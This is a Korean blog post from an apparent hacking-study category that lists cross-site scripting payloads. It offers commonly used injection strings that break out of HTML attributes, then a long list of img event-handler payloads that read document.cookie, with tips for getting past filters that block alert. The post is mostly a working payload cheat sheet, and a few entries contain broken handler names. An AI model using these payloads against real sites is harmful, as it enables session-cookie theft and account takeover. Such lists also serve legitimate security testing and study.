자주 사용하는 패턴 (구문을 응답소스코드에 맞춰서 사용)
1. <svg onmouseover="confirm(1)">
2. <SCRIPT>alert(document.cookie)</SCRIPT>
3. "><svg onload="alert(document.cookie)">.png
4. `;return false});});alert xss`;</script>
5. <img src=x onwheel="alert(document.cookie)">
6. "><script>alert(document.cookie)</script>
7. ['"><input type="text" onmouseover="confirm(document.cookie)"style="height:1000px: width:1000px" name="test[']
-> 맞춤 코드
10. "svg/onload="confirm(document.cookie)"
이벤트 핸들러로 뚫을때 주로 사용하는 구문 (alert가 막힌다면 confirm으로 뚫기)
<img src=x onwheel="alert(document.cookie)">
<img src=x onclick="alert(document.cookie)">
<img src=x onbblclick="alert(document.cookie)">
<img src=x ondrag="alert(document.cookie)">
<img src=x ondragend="alert(document.cookie)">
<img src=x ondragstart="alert(document.cookie)">
<img src=x ondragover="alert(document.cookie)">
<img src=x ondragdrop="alert(document.cookie)">
<img src=x onerror="alert(document.cookie)">
<img src=x onfocus="alert(document.cookie)">
<img src=x onfocusin="alert(document.cookie)">
<img src=x onfocusout="alert(document.cookie)">
<img src=x onkeydown="alert(document.cookie)">
<img src=x onkeypress="alert(document.cookie)">
<img src=x onkeyup="alert(document.cookie)">
<img src=x onload="alert(document.cookie)">
<img src=x onmousedown="alert(document.cookie)">
<img src=x onmouseenter="alert(document.cookie)">
<img src=x onmouseover="alert(document.cookie)">
<img src=x onmousemove="alert(document.cookie)">
<img src=x onmouseover="alert(document.cookie)">
<img src=x onmouseup="alert(document.cookie)">
<img src=x onmousewheel="alert(document.cookie)">
<img src=x onmousemove="alert(document.cookie)">
<img src=x onscroll="alert(document.cookie)">
'공부 > 해킹공부' 카테고리의 다른 글
현재 사용하고 있는 Editor 샘플페이지 (0) | 2023.08.13 |
---|---|
[Snort]정규 표현식 작성 (0) | 2023.08.08 |
[와이어샤크] FTP 패킷분석 (0) | 2023.08.07 |
무료 키로거 정리 (0) | 2021.02.28 |
[액티브스캐닝] 간편한 스캐닝 툴 Sparta (4) | 2020.09.05 |